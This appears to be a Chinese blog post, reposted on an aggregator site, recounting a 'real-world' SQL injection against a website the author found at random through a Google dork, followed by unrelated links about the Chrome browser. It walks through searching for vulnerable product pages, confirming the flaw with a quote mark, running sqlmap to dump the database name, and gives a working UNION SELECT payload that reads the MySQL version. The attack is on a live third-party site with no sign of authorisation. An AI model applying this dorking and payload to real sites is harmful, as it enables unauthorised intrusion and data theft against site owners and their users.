1. Toy模板网首页
  2. > Toy博客

一次SQL注入实战记录

5月前 作者:smileleooo 分类:Toy博客 阅读(25) 违法举报

这篇具有很好参考价值的文章主要介绍了一次SQL注入实战记录。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、在Google浏览器用inurl搜索语法寻找目标

inrul:productInfo.php?id=

二、随便点开几个连接,目标出现了

一次SQL注入实战记录

给id参数加单引号',页面不正常了,在上方还出现了查询报错的相关信息,相关信息还给出了数据库是MySQL。

一次SQL注入实战记录

三、使用sqlmap进行扫描

一次SQL注入实战记录

经过小小的等待,有收获了,爆出了数据库名。

一次SQL注入实战记录

根据sqlmap的给出paylaod可以进行SQL注入,改变concat函数的参数就可以了手工利用了,如下payload可以爆出数据库版本:

-8444%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(VERSION(),0x41756942736671524472427366534f54644f42527170684356664c43775571656253554978616557,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL--%20-

concat函数的三个参数都是可以回显利用的。

一次SQL注入实战记录

到这里SQL注入已经完成了,点到为止。

若有错误,欢迎指正!o( ̄▽ ̄)ブ文章来源地址https://www.toymoban.com/news/detail-844387.html

到了这里,关于一次SQL注入实战记录的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • google浏览器插件开发

    在开发Chrome插件时,以下几个文件的作用如下: manifest.json :这是Chrome插件的清单文件,用于配置插件的基本信息、权限、页面跳转等。其中包括插件的名称、版本号、图标、后台脚本、浏览器动作等信息。 background.js :这是Chrome插件的后台脚本文件,用于处理插件的后台逻

    2024年04月28日
    浏览(28)
  • Linux 安装 Google 浏览器

    Linux 安装 Google 浏览器

    下载安装包时要根据系统架构选择安装包。 查看系统架构:lscpu 1、deb 包默认是 arm 架构; 2、rpm 包默认是 x86 架构。 安装包下载路径 1、点击链接跳转后,滑倒最下边,点击其他平台; 2、点击其他平台后,根据系统架构选择需要的安装包; 打开终端,运行命令: yum locali

    2024年02月08日
    浏览(36)
  • 【vscode设置默认浏览器为google,配置默认浏览器没有google,VS Code 报Windows找不到文件‘chrome‘】

    【vscode设置默认浏览器为google,配置默认浏览器没有google,VS Code 报Windows找不到文件‘chrome‘】

    VS Code 报Windows 找不到‘chrome’ 项目启动ctar+鼠标左键快捷打开并没有使用默认浏览器 并且自己去浏览器配置并提供完整的选项 网上有很多其他的答案不过对我都没有 最后解决是在google里配置 不是默认浏览器会有个按钮 点一下就跳转到系统配置默认浏览器中,选项就可以出

    2024年02月12日
    浏览(43)
  • Ubuntu20.04安装Google浏览器

    Ubuntu20.04安装Google浏览器

    Chrome 不是一个开源的浏览器,并且它不被包含在标准的 Ubuntu 软件源中。在 Ubuntu 中安装 Google Chrome 是一个非常直接的过程。我们将会从官方网站下载安装文件,并且通过命令行工具来安装它。 使用 Ctrl+Alt+T 快捷键或者点击终端图标,打开你的终端;也可以在指定文件夹,右

    2024年04月09日
    浏览(51)
  • linux下安装google谷歌浏览器

    linux下安装google谷歌浏览器

    记录下linux下安装谷歌浏览器全过程。 https://www.google.cn/intl/zh-CN/chrome/ 访问谷歌浏览器,拉到最下面 点击其他平台,选择linux 然后下载下来 下载完成后得到一个安装包 过程中如果需要安装相应的依赖包,选择y即可。 安装完成后,点击应用程序–互联网–google-chorme后会加载

    2024年02月12日
    浏览(37)
  • 配置和google浏览器版本一直的webdriver

    配置和google浏览器版本一直的webdriver

    一  下载google浏览器     1  目前百度到的都是广告,外网下载又需要翻墙。我提供了两个版本的浏览器。 链接: https://pan.baidu.com/s/15qeejARqcadG7bgGCYWY5w 提取码: kjvw  红色标记的是浏览器版本 二 下载webdriver   访问该网址 http://chromedriver.storage.googleapis.com/index.html 按  ctrl+f   ,

    2024年02月12日
    浏览(32)
  • 如何强制卸载Google浏览器,不用担心Google打开为白板,亲测有效。

    如何强制卸载Google浏览器,不用担心Google打开为白板,亲测有效。

    步骤一: 打开windows窗口   步骤二: 点击设置   步骤三: 点击应用   步骤四: 在搜索框里查找Google或者谷歌   步骤五: 出现现在的应用点击Uninstall或者卸载谷歌会弹出信息卸载就可以了 步骤六: 这步骤参考下边的方法,与第一种方法无关,是我所推荐的之前在外网请教

    2024年02月05日
    浏览(50)
  • Google浏览器 安装 Elasticsearch-head 插件

    Google浏览器 安装 Elasticsearch-head 插件

    下载地址: https://github.com/liufengji/es-head 1)将 elasticsearch-head.crx 更名为 elasticsearch-head.rar,然后解压缩 2)进入elasticsearch-head文件夹将_metadata文件夹重命名为metadata 在Google浏览器中打开扩展程序,点击加载已解压的扩展程序,选择解压elasticsearch-head文件夹即可添加插件成功 点

    2024年02月13日
    浏览(36)
  • Selenium 远程调用 Google Chrome 谷歌浏览器

    Selenium 远程调用 Google Chrome 谷歌浏览器

    我最近又使用谷歌浏览远程调用发现不能使用了 参考连接 具体原因是因为 谷歌浏览器在11几的版本(目前是:114.0.5735.91)之后只能使用JDK高版本我目前使用的是JDK17版本远程调用如果是低版本比如102左右的是好使的,新使用方法我更新在下面 一. 前沿 每次重新运行Selenium都直接弹

    2024年02月10日
    浏览(37)
  • Google Chrome 浏览器以全屏模式打开

    Google Chrome 浏览器以全屏模式打开

    win10 Google Chrome 或者 添加参数: --disable-background-networking 版本之间有差异,举几个例子 可能1 在选项页面打开高级设置,才能看到语言选项。 将“询问是否翻译非您所用语言的页面”选项禁用。 可能2 可能3 在 HTML DOM 的 head 部分添加如下执行: https://blog.csdn.net/wide288/article

    2024年02月09日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包